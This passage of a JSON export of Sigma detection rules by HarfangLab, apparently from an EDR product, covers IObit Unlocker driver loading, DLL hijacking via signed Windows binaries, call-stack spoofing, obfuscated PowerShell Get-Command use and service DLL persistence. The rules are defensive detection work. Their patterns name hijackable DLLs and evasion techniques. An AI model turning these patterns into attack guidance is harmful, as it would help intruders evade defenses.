"content": "title: IObit Unlocker Driver Loaded\nid: 79f2b027-0261-441e-a1d1-d569515a7c9b\ndescription: |\n Detects the loading of the IObit Unlocker driver.\n IObit Unlocker is a free utility tool that allows the removal of files and folders that are currently being locked by the system because used by another program or resource.\n Adversaries may used this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\n It is recommended to check if the driver is expected to be loaded on this machine and to look for other suspicious actions on the host.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79f2b027-0261-441e-a1d1-d569515a7c9b",
"rule_name": "IObit Unlocker Driver Loaded",
"rule_description": "Detects the loading of the IObit Unlocker driver.\nIObit Unlocker is a free utility tool that allows the removal of files and folders that are currently being locked by the system because used by another program or resource.\nAdversaries may used this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\nIt is recommended to check if the driver is expected to be loaded on this machine and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "79f83292-015d-4a28-8506-63731c5b8f83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605515Z",
"creation_date": "2026-03-23T11:45:34.605519Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605526Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1124/"
],
"name": "t1124_system_time_discovery_with_net.yml",
"content": "title: System Time Discovered via net.exe\nid: 79f83292-015d-4a28-8506-63731c5b8f83\ndescription: |\n Detects the execution of net1.exe with the time option.\n Adversaries can use this command during discovery phase to get the current time on the target system.\n It is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\n If this action is legitimate and recurrent, it is highly recommended to create a whitelist for certain machines or parent scripts.\nreferences:\n - https://attack.mitre.org/techniques/T1124/\ndate: 2022/12/01\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1124\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|contains: ' time'\n\n exclusion_set:\n CommandLine|contains: ' /set'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "79f83292-015d-4a28-8506-63731c5b8f83",
"rule_name": "System Time Discovered via net.exe",
"rule_description": "Detects the execution of net1.exe with the time option.\nAdversaries can use this command during discovery phase to get the current time on the target system.\nIt is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\nIf this action is legitimate and recurrent, it is highly recommended to create a whitelist for certain machines or parent scripts.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1124"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7a38622a-a464-4772-8ad7-6a4af058f902",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586317Z",
"creation_date": "2026-03-23T11:45:34.586322Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via TpmVscMgrSvr.exe\nid: 7a38622a-a464-4772-8ad7-6a4af058f902\ndescription: |\n Detects potential Windows DLL Hijacking via TpmVscMgrSvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TpmVscMgrSvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7a38622a-a464-4772-8ad7-6a4af058f902",
"rule_name": "DLL Hijacking via TpmVscMgrSvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TpmVscMgrSvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7aa1a4f9-41af-4cd0-ad9a-4f846568bb24",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070103Z",
"creation_date": "2026-03-23T11:45:34.070105Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_inj_thr_callstack_spoofing_vulcan_raven.yml",
"content": "title: Spoofed Injected Thread Call Stack Related to VulcanRaven\nid: 7aa1a4f9-41af-4cd0-ad9a-4f846568bb24\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: injected_thread\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n - 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'lsm.dll'\n - 'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7aa1a4f9-41af-4cd0-ad9a-4f846568bb24",
"rule_name": "Spoofed Injected Thread Call Stack Related to VulcanRaven",
"rule_description": "Detects arbitrary call stacks related to the VulcanRaven PoC.\nVulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084832Z",
"creation_date": "2026-03-23T11:45:34.084834Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084839Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command",
"https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel",
"https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/010/"
],
"name": "t1059_001_powershell_suspicious_getcommand_cmdlet.yml",
"content": "title: Suspicious Get-Command Cmdlet Executed via PowerShell\nid: 7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4\ndescription: |\n Detects the suspicious usage of the PowerShell Get-Command cmdlet and its built-in gcm alias.\n The Get-Command cmdlet gets all commands that are installed on the computer and is used, in combination with a filter, by attackers to call cmdlets in an obfuscated way.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command\n - https://www.deepinstinct.com/blog/muddyc2go-latest-c2-framework-used-by-iranian-apt-muddywater-spotted-in-israel\n - https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/010/\ndate: 2023/11/10\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.010\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '&(Get-Command'\n - '& (Get-Command'\n - '&(gcm'\n - '& (gcm'\n\n exclusion_arcgis:\n - PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\ArcGIS\\DscResources\\ArcGIS_xFirewall\\ArcGIS_xFirewall.psm1'\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\ArcGIS\\\\*\\DscResources\\ArcGIS_xFirewall\\ArcGIS_xFirewall.psm1'\n - PowershellCommand|contains: 'return &(Get-Command ?Get-NetFirewall$Property?) -AssociatedNetFireWallRule $FireWallRule'\n\n exclusion_velociraptor:\n ProcessParentImage: '?:\\Program Files\\Velociraptor\\Velociraptor.exe'\n\n exclusion_warp:\n ProcessCommandLine|contains|all:\n - 'PSReadline;$global:_warpOriginalPrompt ='\n - '$global:_warpSessionId ='\n - 'session_id = $_warpSessionId; shell'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ae9c4cc-ed50-4fbe-bc8d-8ccdea2aa0c4",
"rule_name": "Suspicious Get-Command Cmdlet Executed via PowerShell",
"rule_description": "Detects the suspicious usage of the PowerShell Get-Command cmdlet and its built-in gcm alias.\nThe Get-Command cmdlet gets all commands that are installed on the computer and is used, in combination with a filter, by attackers to call cmdlets in an obfuscated way.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.010",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b3b21b7-c748-42a2-98b5-45be960c87bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592217Z",
"creation_date": "2026-03-23T11:45:34.592220Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592228Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shrpubw.yml",
"content": "title: DLL Hijacking via shrpubw.exe\nid: 7b3b21b7-c748-42a2-98b5-45be960c87bd\ndescription: |\n Detects potential Windows DLL Hijacking via shrpubw.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'shrpubw.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\aclui.dll'\n - '\\mfc42u.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b3b21b7-c748-42a2-98b5-45be960c87bd",
"rule_name": "DLL Hijacking via shrpubw.exe",
"rule_description": "Detects potential Windows DLL Hijacking via shrpubw.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072218Z",
"creation_date": "2026-03-23T11:45:34.072220Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072224Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain",
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_001_service_dll_no_envvars.yml",
"content": "title: Service DLL Without Environment Variable\nid: 7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4\ndescription: |\n Detects the creation or modification of a service DLL without using environment variables such as %System32% or %WinDir% to construct the path of the DLL to launch.\n Adversaries may modify or create a new service based on a DLL to persist on a system.\n It is recommended to check the origin of the library to determine its legitimacy and the activity of the process for malicious behavior.\nreferences:\n - https://www.ired.team/offensive-security/persistence/persisting-in-svchost.exe-with-a-service-dll-servicemain\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2024/09/26\nmodified: 2025/05/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\Parameters\\\\ServiceDll'\n\n filter_envvars:\n Details|contains: \"%\"\n\n exclusion_spool:\n Image: '?:\\Windows\\System32\\regsvr32.exe'\n Details|startswith:\n - '?:\\WINDOWS\\system32\\spool\\drivers\\x64\\3\\'\n - '?:\\WINDOWS\\system32\\spool\\drivers\\W32X86\\3\\'\n\n exclusion_pml_driver:\n Details: '?:\\Windows\\System32\\HPZipm12.dll'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Pml Driver HPZ12\\Parameters\\ServiceDll'\n\n exclusion_msiexec:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_w32time:\n Image: '?:\\Windows\\System32\\w32tm.exe'\n Details: '?:\\WINDOWS\\SYSTEM32\\w32time.DLL'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\w32time\\Parameters\\ServiceDll'\n\n exclusion_azure:\n Image: '?:\\Program Files\\Microsoft\\AzureAttestService\\AzureAttestServiceInstaller.exe'\n Details: '?:\\Program Files\\Microsoft\\AzureAttestService\\AzureAttestService.dll'\n\n exclusion_hp:\n ProcessParentImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '?:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\hpq*.dll' # (hpqddsvc.dll, hpqcxs08.dll)\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b3c8d99-ed7c-436d-aeb2-0f5cb60ebab4",
"rule_name": "Service DLL Without Environment Variable",
"rule_description": "Detects the creation or modification of a service DLL without using environment variables such as %System32% or %WinDir% to construct the path of the DLL to launch.\nAdversaries may modify or create a new service based on a DLL to persist on a system.\nIt is recommended to check the origin of the library to determine its legitimacy and the activity of the process for malicious behavior.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-05-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.003",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b4c77e7-bb49-48f3-a0a5-dad094238be9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602838Z",
"creation_date": "2026-03-23T11:45:34.602842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gpfixup.yml",
"content": "title: DLL Hijacking via gpfixup.exe\nid: 7b4c77e7-bb49-48f3-a0a5-dad094238be9\ndescription: |\n Detects potential Windows DLL Hijacking via gpfixup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpfixup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\credui.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b4c77e7-bb49-48f3-a0a5-dad094238be9",
"rule_name": "DLL Hijacking via gpfixup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gpfixup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b4df4b6-addb-4e81-b827-888adb454c64",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
